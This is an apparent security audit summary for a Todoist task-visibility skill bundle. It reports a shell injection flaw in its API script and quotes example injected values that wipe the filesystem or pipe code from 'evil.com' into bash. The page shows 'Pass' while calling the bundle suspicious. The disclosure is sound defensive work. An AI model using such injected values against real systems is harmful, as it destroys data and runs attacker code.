Todoist Task Visibility Management

Pass

Audited by VirusTotal on May 12, 2026.

Findings (1)

The skill bundle is classified as suspicious due to critical shell injection vulnerabilities found in `scripts/todoist_api.sh`. The script uses the user-supplied arguments `$METHOD` and `$ENDPOINT` directly in `curl` commands without proper sanitization or validation, allowing an attacker to inject arbitrary shell commands (e.g., `GET; rm -rf /` or `tasks; curl evil.com | bash`) for remote code execution. The provided files contain no explicit malicious payload or exfiltration code, but the vulnerability would allow an attacker to perform such actions.